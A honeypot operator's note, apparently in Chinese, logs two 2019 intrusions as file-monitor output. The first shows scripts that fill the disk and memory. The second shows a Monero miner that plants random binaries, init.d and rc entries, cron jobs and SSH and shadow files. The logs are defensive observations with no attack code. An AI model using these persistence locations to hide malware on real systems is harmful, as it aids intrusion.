捕捉到的东西
https://github.com/yingshang/Legacy-of-intrusion.git
2019-3-19号
黑客上传了几个脚本,里面有一个不断生成和并不断执行,直接你的硬盘和内存爆破,我的蜜罐直接被卡死
Line 13703: INFO:root:CREATE event : /dev/shm/BIdsqkKc 2019-03-19 11:33:33.934697 Line 13862: INFO:root:CREATE event : /dev/shm/BIdsqkKc 2019-03-19 11:33:41.071763 Line 14425: INFO:root:CREATE event : /dev/shm/B00M 2019-03-19 11:34:07.028623 Line 14569: INFO:root:CREATE event : /dev/shm/TfkajmkIH 2019-03-19 11:34:13.624843 Line 14709: INFO:root:CREATE event : /dev/shm/TfkajmkIH 2019-03-19 11:34:20.874330 Line 15226: INFO:root:CREATE event : /dev/shm/B00M 2019-03-19 11:34:44.845148 Line 15710: INFO:root:CREATE event : /root/mi3307 2019-03-19 11:47:38.111477 Line 15918: INFO:root:CREATE event : /lib/libudev.so 2019-03-19 11:47:38.640116 Line 16228: INFO:root:CREATE event : /usr/bin/mljdjbqxuq 2019-03-19 11:47:39.317262 Line 16561: INFO:root:CREATE event : /etc/init.d/mljdjbqxuq 2019-03-19 11:47:39.754944 Line 16575: INFO:root:CREATE event : /etc/cron.hourly/gcc.sh 2019-03-19 11:47:39.757342 Line 16588: INFO:root:CREATE event : /etc/rc1.d/S90mljdjbqxuq 2019-03-19 11:47:39.760102 Line 16591: INFO:root:CREATE event : /etc/rc2.d/S90mljdjbqxuq 2019-03-19 11:47:39.760918 Line 16593: INFO:root:CREATE event : /etc/rc3.d/S90mljdjbqxuq 2019-03-19 11:47:39.761409 Line 16595: INFO:root:CREATE event : /etc/rc4.d/S90mljdjbqxuq 2019-03-19 11:47:39.761975 Line 16607: INFO:root:CREATE event : /etc/rc5.d/S90mljdjbqxuq 2019-03-19 11:47:39.763688 Line 16703: INFO:root:CREATE event : /etc/sedTeXeUr 2019-03-19 11:47:39.786380 Line 16713: INFO:root:CREATE event : /usr/bin/itwgznmnoq 2019-03-19 11:47:39.790291 Line 17029: INFO:root:CREATE event : /run/gcc.pid 2019-03-19 11:47:39.880049 Line 17699: INFO:root:CREATE event : /usr/bin/hdgxvqdrsm 2019-03-19 11:47:43.803555 Line 18623: INFO:root:CREATE event : /usr/bin/tfyczjenzc 2019-03-19 11:47:48.795079 Line 19734: INFO:root:CREATE event : /usr/bin/tcbajoqxih 2019-03-19 11:47:53.814405 Line 20911: INFO:root:CREATE event : /usr/bin/qwqtwyndll 2019-03-19 11:47:58.862042 Line 21996: INFO:root:CREATE event : /usr/bin/wlrxmjobio 2019-03-19 11:48:03.851830 Line 23074: INFO:root:CREATE event : /usr/bin/rghrsafgrk 2019-03-19 11:48:08.877788 Line 24066: INFO:root:CREATE event : /usr/bin/zgozhbbcyy 2019-03-19 11:48:13.910422 Line 25160: INFO:root:CREATE event : /usr/bin/wvrtivxvlm 2019-03-19 11:48:18.932093 Line 26254: INFO:root:CREATE event : /usr/bin/tepjqlylch 2019-03-19 11:48:23.973665 Line 27355: INFO:root:CREATE event : /usr/bin/dpcuygdzwd 2019-03-19 11:48:29.063822 Line 28441: INFO:root:CREATE event : /usr/bin/efuaffgsgs 2019-03-19 11:48:34.089048 Line 29538: INFO:root:CREATE event : /usr/bin/gsfulgfjzd 2019-03-19 11:48:39.112690 Line 30656: INFO:root:CREATE event : /usr/bin/tjminyopuf 2019-03-19 11:48:44.134765 Line 31741: INFO:root:CREATE event : /usr/bin/qjyogmvqxv 2019-03-19 11:48:49.154488 Line 32854: INFO:root:CREATE event : /usr/bin/avjvmbemyu 2019-03-19 11:48:54.203118 Line 33878: INFO:root:CREATE event : /usr/bin/ibuidgnelw 2019-03-19 11:48:59.229367 Line 34992: INFO:root:CREATE event : /usr/bin/iksgdzxmrr 2019-03-19 11:49:04.248427 Line 36078: INFO:root:CREATE event : /usr/bin/dqhhhcfdrs 2019-03-19 11:49:09.282517 Line 37195: INFO:root:CREATE event : /usr/bin/liryxanysl 2019-03-19 11:49:14.320403 Line 38311: INFO:root:CREATE event : /usr/bin/ikvrwrtbar 2019-03-19 11:49:19.386290 Line 39421: INFO:root:CREATE event : /usr/bin/wgbhpgkhva 2019-03-19 11:49:24.415379 Line 40532: INFO:root:CREATE event : /usr/bin/ilwcdmjaxx 2019-03-19 11:49:29.484670 Line 41613: INFO:root:CREATE event : /usr/bin/jzahqxwfix 2019-03-19 11:49:34.510543 Line 42714: INFO:root:CREATE event : /usr/bin/hkjidwudsj 2019-03-19 11:49:39.584346 Line 43802: INFO:root:CREATE event : /usr/bin/ettnlpziav 2019-03-19 11:49:44.645891 Line 44898: INFO:root:CREATE event : /usr/bin/xzjrzdjjso 2019-03-19 11:49:49.646176 Line 45996: INFO:root:CREATE event : /usr/bin/mrhxtxvoge 2019-03-19 11:49:54.707326 Line 47069: INFO:root:CREATE event : /usr/bin/djohznghsk 2019-03-19 11:49:59.798660 Line 48193: INFO:root:CREATE event : /usr/bin/caqliaehly 2019-03-19 11:50:04.833356 Line 49296: INFO:root:CREATE event : /usr/bin/vrkxxcxzuj 2019-03-19 11:50:09.852183 Line 50376: INFO:root:CREATE event : /usr/bin/joqhtqzygl 2019-03-19 11:50:14.892930 Line 51465: INFO:root:CREATE event : /usr/bin/mvrmlzpfkr 2019-03-19 11:50:19.921282 Line 52584: INFO:root:CREATE event : /usr/bin/xecszwdprk 2019-03-19 11:50:24.963665 Line 53680: INFO:root:CREATE event : /usr/bin/eaenxzzblz 2019-03-19 11:50:29.990015 Line 54500: INFO:root:CREATE event : /usr/bin/uuxflgtgay 2019-03-19 11:50:35.016746 Line 55613: INFO:root:CREATE event : /usr/bin/sowaxanykz 2019-03-19 11:50:40.045852 Line 56700: INFO:root:CREATE event : /usr/bin/rngverfygu 2019-03-19 11:50:45.069087 Line 57797: INFO:root:CREATE event : /usr/bin/kelvnqcwgr 2019-03-19 11:50:50.112345 Line 58917: INFO:root:CREATE event : /usr/bin/pjkfnqrxjl 2019-03-19 11:50:55.136699 Line 60016: INFO:root:CREATE event : /usr/bin/wqzbdjdqfn 2019-03-19 11:51:00.188586 Line 61128: INFO:root:CREATE event : /usr/bin/hpkdvojjxw 2019-03-19 11:51:05.210515 Line 62249: INFO:root:CREATE event : /usr/bin/rhtoxzhlms 2019-03-19 11:51:10.234045 Line 63354: INFO:root:CREATE event : /usr/bin/oqvwdfxeaw 2019-03-19 11:51:15.274103 Line 64491: INFO:root:CREATE event : /usr/bin/cclojjaive 2019-03-19 11:51:20.317813 Line 65593: INFO:root:CREATE event : /usr/bin/vqqpaelesh 2019-03-19 11:51:25.350728 Line 66687: INFO:root:CREATE event : /usr/bin/rigapuhpdn 2019-03-19 11:51:30.383180 Line 67822: INFO:root:CREATE event : /usr/bin/voqjewxuqu 2019-03-19 11:51:35.447531 Line 68886: INFO:root:CREATE event : /usr/bin/ztxkldmywg 2019-03-19 11:51:40.447447 Line 69968: INFO:root:CREATE event : /usr/bin/zgkwshpmss 2019-03-19 11:51:45.582693 Line 71079: INFO:root:CREATE event : /usr/bin/upcultngri 2019-03-19 11:51:50.608717 Line 72158: INFO:root:CREATE event : /usr/bin/rojksksovb 2019-03-19 11:51:55.640087 Line 73243: INFO:root:CREATE event : /usr/bin/lalzylwttz 2019-03-19 11:52:00.664435 Line 74343: INFO:root:CREATE event : /usr/bin/pvoljuuvng 2019-03-19 11:52:05.703119 Line 75451: INFO:root:CREATE event : /usr/bin/juwtljomtq 2019-03-19 11:52:10.771522 Line 76571: INFO:root:CREATE event : /usr/bin/ejqcwhvylv 2019-03-19 11:52:15.904960 Line 77682: INFO:root:CREATE event : /usr/bin/dwarotcwei 2019-03-19 11:52:20.946080 Line 78784: INFO:root:CREATE event : /usr/bin/nwlhaspckz 2019-03-19 11:52:25.985090 Line 79894: INFO:root:CREATE event : /usr/bin/zomshobpvz 2019-03-19 11:52:31.100967 Line 80984: INFO:root:CREATE event : /usr/bin/cdjucqrwsr 2019-03-19 11:52:36.243796 Line 82076: INFO:root:CREATE event : /usr/bin/pnjlomfubx 2019-03-19 11:52:41.262007 Line 83157: INFO:root:CREATE event : /usr/bin/kmcmzgokzm 2019-03-19 11:52:46.301496 Line 84255: INFO:root:CREATE event : /usr/bin/zghzlgmsyj 2019-03-19 11:52:51.323833 Line 85379: INFO:root:CREATE event : /usr/bin/tjsnhqgoog 2019-03-19 11:52:56.381780 Line 86438: INFO:root:CREATE event : /usr/bin/lbodntcnpi 2019-03-19 11:53:01.384079 Line 87523: INFO:root:CREATE event : /usr/bin/sclkrpxyrl 2019-03-19 11:53:06.397228 Line 88718: INFO:root:CREATE event : /usr/bin/qimqfzkzxz 2019-03-19 11:53:11.483370 Line 89801: INFO:root:CREATE event : /usr/bin/yhpjlrzndo 2019-03-19 11:53:16.493737 Line 90892: INFO:root:CREATE event : /usr/bin/ztmfopzspc 2019-03-19 11:53:21.625367 Line 91991: INFO:root:CREATE event : /usr/bin/jaxashciyq 2019-03-19 11:53:26.649283 Line 93080: INFO:root:CREATE event : /usr/bin/jbwynyusjm 2019-03-19 11:53:31.667976 Line 94141: INFO:root:CREATE event : /usr/bin/hwsqtsempg 2019-03-19 11:53:36.780939 Line 95238: INFO:root:CREATE event : /usr/bin/welovbhjft 2019-03-19 11:53:41.863879 Line 96150: INFO:root:CREATE event : /usr/bin/wlzubzaieu 2019-03-19 11:53:46.885064 Line 97258: INFO:root:CREATE event : /usr/bin/tlnktrgouv 2019-03-19 11:53:51.934835 Line 98322: INFO:root:CREATE event : /usr/bin/niozmehmuy 2019-03-19 11:53:56.993401 Line 99320: INFO:root:CREATE event : /usr/bin/yyxuxablqc 2019-03-19 11:54:02.223188 Line 100385: INFO:root:CREATE event : /usr/bin/xioswewick 2019-03-19 11:54:07.243593 Line 101468: INFO:root:CREATE event : /usr/bin/kdhrthmfyv 2019-03-19 11:54:12.264061 Line 102492: INFO:root:CREATE event : /usr/bin/mgnuwfmtbn 2019-03-19 11:54:17.279359 Line 103486: INFO:root:CREATE event : /usr/bin/yldlboumsy 2019-03-19 11:54:22.297750 Line 104678: INFO:root:CREATE event : /usr/bin/ywetrirkxi 2019-03-19 11:54:27.316287 Line 105804: INFO:root:CREATE event : /usr/bin/jepqzfnftn 2019-03-19 11:54:32.333110 Line 106890: INFO:root:CREATE event : /usr/bin/imqafwkjdw 2019-03-19 11:54:37.355253 Line 108015: INFO:root:CREATE event : /usr/bin/qvygfqisbs 2019-03-19 11:54:42.370762 Line 109151: INFO:root:CREATE event : /usr/bin/upvljogxuc 2019-03-19 11:54:47.392550 Line 110244: INFO:root:CREATE event : /usr/bin/ydxqyonnnp 2019-03-19 11:54:52.409708 Line 111367: INFO:root:CREATE event : /usr/bin/hgziqmhpst 2019-03-19 11:54:57.433024 Line 112485: INFO:root:CREATE event : /usr/bin/qbdblchcdr 2019-03-19 11:55:02.453102 Line 113608: INFO:root:CREATE event : /usr/bin/sywscbdtxw 2019-03-19 11:55:07.471159 Line 114658: INFO:root:CREATE event : /usr/bin/hnykoobvyi 2019-03-19 11:55:12.489864 Line 115778: INFO:root:CREATE event : /usr/bin/ntbewdfawr 2019-03-19 11:55:17.507733 Line 116901: INFO:root:CREATE event : /usr/bin/cjiptqfzyn 2019-03-19 11:55:22.523887 Line 118005: INFO:root:CREATE event : /usr/bin/kmkxseewmj 2019-03-19 11:55:27.544122 Line 119119: INFO:root:CREATE event : /usr/bin/udvkhawyzw 2019-03-19 11:55:32.564481 Line 120225: INFO:root:CREATE event : /usr/bin/iallspknhm 2019-03-19 11:55:37.584333 Line 121445: INFO:root:CREATE event : /usr/bin/jinxrssxzc 2019-03-19 11:55:42.602588 Line 122570: INFO:root:CREATE event : /usr/bin/refospazwn 2019-03-19 11:55:47.624460 Line 123661: INFO:root:CREATE event : /usr/bin/ocnwsicxys 2019-03-19 11:55:52.640890 Line 124893: INFO:root:CREATE event : /usr/bin/nhmsuqhjdp 2019-03-19 11:55:57.659310 Line 125984: INFO:root:CREATE event : /usr/bin/gzaywdyqhr 2019-03-19 11:56:02.677282 Line 127093: INFO:root:CREATE event : /usr/bin/izgnqjwzbe 2019-03-19 11:56:07.696340 Line 128215: INFO:root:CREATE event : /usr/bin/yipnblnksp 2019-03-19 11:56:12.716089 Line 129335: INFO:root:CREATE event : /usr/bin/fowgrzbpoo 2019-03-19 11:56:17.737022 Line 130466: INFO:root:CREATE event : /usr/bin/hbwrucsaye 2019-03-19 11:56:22.755358 Line 131555: INFO:root:CREATE event : /usr/bin/echktugnfh 2019-03-19 11:56:27.772768 Line 132601: INFO:root:CREATE event : /usr/bin/rqhxnpgivg 2019-03-19 11:56:32.791967 Line 133712: INFO:root:CREATE event : /usr/bin/ukxikaonip 2019-03-19 11:56:37.811970 Line 134820: INFO:root:CREATE event : /usr/bin/axjjvapppz 2019-03-19 11:56:42.832591 Line 135932: INFO:root:CREATE event : /usr/bin/mjcjwqedqv 2019-03-19 11:56:47.853416 Line 137041: INFO:root:CREATE event : /usr/bin/fephwodrjv 2019-03-19 11:56:52.874117 Line 138012: INFO:root:CREATE event : /usr/bin/tzlzjmxlfi 2019-03-19 11:56:57.893816 Line 139117: INFO:root:CREATE event : /usr/bin/bzqptzkwfv 2019-03-19 11:57:02.910851 Line 140205: INFO:root:CREATE event : /usr/bin/kplhzzybnr 2019-03-19 11:57:07.932082 Line 141302: INFO:root:CREATE event : /usr/bin/dmuworqhap 2019-03-19 11:57:12.948061 Line 142406: INFO:root:CREATE event : /usr/bin/wmazvhgoyq 2019-03-19 11:57:17.971944 Line 143463: INFO:root:CREATE event : /usr/bin/zlvobfyvuo 2019-03-19 11:57:22.993139 Line 144571: INFO:root:CREATE event : /usr/bin/xteuvtqgou 2019-03-19 11:57:28.009971 Line 145678: INFO:root:CREATE event : /usr/bin/kigyaggzht 2019-03-19 11:57:33.032718 Line 146787: INFO:root:CREATE event : /usr/bin/raeykerfvg 2019-03-19 11:57:38.051081 Line 147888: INFO:root:CREATE event : /usr/bin/darjqjewfh 2019-03-19 11:57:43.074353 Line 148972: INFO:root:CREATE event : /usr/bin/wxbnxxydvo 2019-03-19 11:57:48.096870 Line 150079: INFO:root:CREATE event : /usr/bin/obcqcdsxuc 2019-03-19 11:57:53.137767 Line 151192: INFO:root:CREATE event : /usr/bin/jveuwxenps 2019-03-19 11:57:58.132597 Line 152050: INFO:root:CREATE event : /usr/bin/ettyutiier 2019-03-19 11:58:03.151999 Line 153163: INFO:root:CREATE event : /usr/bin/tjjjjwicxu 2019-03-19 11:58:08.169554 Line 154358: INFO:root:CREATE event : /usr/bin/hsehzxokyd 2019-03-19 11:58:13.187791 Line 155218: INFO:root:CREATE event : /usr/bin/foctkvooxa 2019-03-19 11:58:18.237427 Line 156336: INFO:root:CREATE event : /usr/bin/hmlwlqheph 2019-03-19 11:58:25.144106 Line 157509: INFO:root:CREATE event : /usr/bin/wdxsweahga 2019-03-19 11:58:30.159639 Line 158607: INFO:root:CREATE event : /usr/bin/zbzewvinhq 2019-03-19 11:58:35.197122 Line 159541: INFO:root:CREATE event : /usr/bin/sagkohkajx 2019-03-19 11:58:40.247561 Line 160672: INFO:root:CREATE event : /usr/bin/xjcsynmmvq 2019-03-19 11:58:45.239934 Line 161875: INFO:root:CREATE event : /usr/bin/rcejcgrblq 2019-03-19 11:58:50.279780 Line 162919: INFO:root:CREATE event : /usr/bin/rfdtscspik 2019-03-19 11:58:55.280718 Line 163971: INFO:root:CREATE event : /usr/bin/aatumvjxpc 2019-03-19 11:59:00.299457 Line 164953: INFO:root:CREATE event : /usr/bin/zxuqmzloir 2019-03-19 11:59:05.324995 Line 166056: INFO:root:CREATE event : /usr/bin/nqgikjvtqg 2019-03-19 11:59:10.367343 Line 167158: INFO:root:CREATE event : /usr/bin/fjptqhsgim 2019-03-19 11:59:15.357824 Line 168290: INFO:root:CREATE event : /usr/bin/cqplewqfvz 2019-03-19 11:59:20.378778 Line 169371: INFO:root:CREATE event : /usr/bin/wcrbyehplz 2019-03-19 11:59:25.395906 Line 170487: INFO:root:CREATE event : /usr/bin/ajysxqmxuz 2019-03-19 11:59:30.415865 Line 171510: INFO:root:CREATE event : /usr/bin/jwkeummbzr 2019-03-19 11:59:35.431802 Line 172606: INFO:root:CREATE event : /usr/bin/nutapebskg 2019-03-19 11:59:40.455338 Line 173785: INFO:root:CREATE event : /usr/bin/ysgktqqvty 2019-03-19 11:59:45.472435 Line 174915: INFO:root:CREATE event : /usr/bin/kxerendyzp 2019-03-19 11:59:50.491086
2019-3-21号
门罗币挖矿
root@localhost:/record# cat monitor.log | grep CREATE INFO:root:CREATE event : /dev/pts/0 2019-03-20 02:08:54.558236 INFO:root:CREATE event : /usr/operation 2019-03-20 02:09:11.379264 INFO:root:CREATE event : /dev/pts/0 2019-03-20 04:09:38.896324 INFO:root:CREATE event : /root/.bash_history 2019-03-20 04:10:02.758810 INFO:root:CREATE event : /bin/ets9b876j46x1a589wmo4htdu7 2019-03-20 15:13:13.196724 INFO:root:CREATE event : /bin/dhpcd 2019-03-20 15:13:21.085534 INFO:root:CREATE event : /etc/nshadow 2019-03-20 15:13:53.019796 INFO:root:CREATE event : /root/.ssh 2019-03-20 15:14:13.246905 INFO:root:CREATE event : /dev/shm/ets9b876j46x1a589wmo4htdu7 2019-03-20 15:14:18.103935 INFO:root:CREATE event : /tmp/ets9b876j46x1a589wmo4htdu7 2019-03-20 15:14:28.352342 INFO:root:CREATE event : /tmp/knrm 2019-03-20 15:14:33.395370 INFO:root:CREATE event : /tmp/r 2019-03-20 15:14:37.392344 INFO:root:CREATE event : /tmp/tmp.efsTWF68ua 2019-03-20 15:14:40.254357 INFO:root:CREATE event : /etc/sedRnzDvp 2019-03-20 15:14:40.262898 INFO:root:CREATE event : /var/spool/cron/crontabs/tmp.wkldnB 2019-03-20 15:14:40.526935 INFO:root:CREATE event : /tmp/tmp.O5mRAvm7ST 2019-03-20 15:14:48.853449 INFO:root:CREATE event : /etc/sed1evIks 2019-03-20 15:14:48.857253 INFO:root:CREATE event : /var/spool/cron/crontabs/tmp.5gdVYA 2019-03-20 15:14:49.207956 INFO:root:CREATE event : /bin/dhpcd 2019-03-20 15:14:53.271247 root@localhost:/record# cat monitor.log | grep MODI INFO:root:MODIFY event : /run/utmp 2019-03-20 02:09:11.359695 INFO:root:MODIFY event : /dev/null 2019-03-20 02:09:11.395338 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 02:09:11.406661 INFO:root:MODIFY event : /run/utmp 2019-03-20 02:09:11.495534 INFO:root:MODIFY event : /sys/fs/cgroup/hugetlb/cgroup.procs 2019-03-20 04:09:38.821148 INFO:root:MODIFY event : /sys/fs/cgroup/hugetlb/cgroup.procs 2019-03-20 04:09:38.822800 INFO:root:MODIFY event : /sys/fs/cgroup/systemd/cgroup.procs 2019-03-20 04:09:38.844848 INFO:root:MODIFY event : /sys/fs/cgroup/systemd/cgroup.procs 2019-03-20 04:09:38.854813 INFO:root:MODIFY event : /sys/fs/cgroup/net_cls,net_prio/cgroup.procs 2019-03-20 04:09:38.855580 INFO:root:MODIFY event : /sys/fs/cgroup/net_cls,net_prio/cgroup.procs 2019-03-20 04:09:38.856195 INFO:root:MODIFY event : /sys/fs/cgroup/net_cls,net_prio/cgroup.procs 2019-03-20 04:09:38.856689 INFO:root:MODIFY event : /sys/fs/cgroup/net_cls,net_prio/cgroup.procs 2019-03-20 04:09:38.859445 INFO:root:MODIFY event : /sys/fs/cgroup/pids/cgroup.procs 2019-03-20 04:09:38.860014 INFO:root:MODIFY event : /sys/fs/cgroup/pids/cgroup.procs 2019-03-20 04:09:38.860579 INFO:root:MODIFY event : /sys/fs/cgroup/cpu,cpuacct/cgroup.procs 2019-03-20 04:09:38.861078 INFO:root:MODIFY event : /sys/fs/cgroup/cpu,cpuacct/cgroup.procs 2019-03-20 04:09:38.861639 INFO:root:MODIFY event : /sys/fs/cgroup/freezer/cgroup.procs 2019-03-20 04:09:38.862137 INFO:root:MODIFY event : /sys/fs/cgroup/freezer/cgroup.procs 2019-03-20 04:09:38.867408 INFO:root:MODIFY event : /sys/fs/cgroup/cpuset/cgroup.procs 2019-03-20 04:09:38.868089 INFO:root:MODIFY event : /sys/fs/cgroup/cpuset/cgroup.procs 2019-03-20 04:09:38.868791 INFO:root:MODIFY event : /sys/fs/cgroup/devices/cgroup.procs 2019-03-20 04:09:38.869305 INFO:root:MODIFY event : /sys/fs/cgroup/devices/cgroup.procs 2019-03-20 04:09:38.869973 INFO:root:MODIFY event : /sys/fs/cgroup/memory/cgroup.procs 2019-03-20 04:09:38.870519 INFO:root:MODIFY event : /sys/fs/cgroup/memory/cgroup.procs 2019-03-20 04:09:38.875420 INFO:root:MODIFY event : /sys/fs/cgroup/perf_event/cgroup.procs 2019-03-20 04:09:38.875940 INFO:root:MODIFY event : /sys/fs/cgroup/perf_event/cgroup.procs 2019-03-20 04:09:38.876589 INFO:root:MODIFY event : /sys/fs/cgroup/blkio/cgroup.procs 2019-03-20 04:09:38.877095 INFO:root:MODIFY event : /sys/fs/cgroup/blkio/cgroup.procs 2019-03-20 04:09:38.877714 INFO:root:MODIFY event : /sys/fs/cgroup/cpu,cpuacct/cgroup.procs 2019-03-20 04:09:38.878251 INFO:root:MODIFY event : /sys/fs/cgroup/cpu,cpuacct/cgroup.procs 2019-03-20 04:09:38.878898 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:39.164499 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:40.176459 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:40.313840 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:40.414496 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:40.541559 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:41.018949 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:41.167878 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:41.480871 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:42.132803 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:42.371361 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:42.558634 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:42.773391 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:43.287925 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:43.377093 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:43.590337 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:43.840286 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:43.927635 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:44.055641 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:45.080589 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:45.256384 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:45.456842 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:46.861468 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:47.374563 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:47.538828 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:47.651745 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:47.721959 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:48.868994 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:49.019794 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:49.081561 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:49.094732 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:51.515933 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:51.640233 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:51.688437 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:51.689514 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:53.395020 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:53.596157 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:53.823423 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:54.049726 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:54.210870 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:54.412377 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:54.512597 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:54.662840 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:54.686100 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:54.686901 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:54.687545 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:59.027683 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:59.152111 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:59.252011 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:59.390181 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:59.566355 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:59.640919 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:09:59.917892 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:10:00.105004 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:10:01.348837 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:10:01.673340 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:10:01.861180 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:10:02.062987 INFO:root:MODIFY event : /dev/pts/0 2019-03-20 04:10:02.740363 INFO:root:MODIFY event : /root/.bash_history 2019-03-20 04:10:02.763356 INFO:root:MODIFY event : /bin/ets9b876j46x1a589wmo4htdu7 2019-03-20 15:13:13.695989 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:13:22.908247 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:13:24.316824 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:13:25.196549 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:13:26.028442 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:13:26.906511 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:13:27.775044 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:13:28.648578 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:13:29.552310 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:13:30.428356 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:13:31.283118 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:13:32.187718 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:13:33.258305 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:13:34.241886 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:13:35.284409 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:13:36.296268 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:13:37.413299 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:13:38.281973 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:13:39.200778 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:13:40.981730 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:13:42.768890 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:13:42.769996 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:13:43.825358 INFO:root:MODIFY event : /etc/nshadow 2019-03-20 15:13:53.022030 INFO:root:MODIFY event : /dev/shm/ets9b876j46x1a589wmo4htdu7 2019-03-20 15:14:18.455523 INFO:root:MODIFY event : /tmp/ets9b876j46x1a589wmo4htdu7 2019-03-20 15:14:28.775480 INFO:root:MODIFY event : /tmp/knrm 2019-03-20 15:14:34.118183 INFO:root:MODIFY event : /tmp/knrm 2019-03-20 15:14:34.253943 INFO:root:MODIFY event : /tmp/knrm 2019-03-20 15:14:34.462640 INFO:root:MODIFY event : /tmp/knrm 2019-03-20 15:14:34.676316 INFO:root:MODIFY event : /tmp/knrm 2019-03-20 15:14:34.835138 INFO:root:MODIFY event : /tmp/knrm 2019-03-20 15:14:35.051863 INFO:root:MODIFY event : /tmp/knrm 2019-03-20 15:14:35.177190 INFO:root:MODIFY event : /tmp/r 2019-03-20 15:14:37.928084 INFO:root:MODIFY event : /etc/sedRnzDvp 2019-03-20 15:14:40.270026 INFO:root:MODIFY event : /var/spool/cron/crontabs/tmp.wkldnB 2019-03-20 15:14:40.528250 INFO:root:MODIFY event : /dev/null 2019-03-20 15:14:43.419044 INFO:root:MODIFY event : /etc/sed1evIks 2019-03-20 15:14:48.857973 INFO:root:MODIFY event : /var/spool/cron/crontabs/tmp.5gdVYA 2019-03-20 15:14:49.217717 INFO:root:MODIFY event : /dev/null 2019-03-20 15:14:50.245119 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:53.816718 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:53.972817 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:54.138558 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:54.303399 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:54.457962 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:54.625196 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:54.784003 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:54.949894 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:55.113563 INFO:root:MODIFY event : /bin/dhpcd 2019-03-20 15:14:55.273291 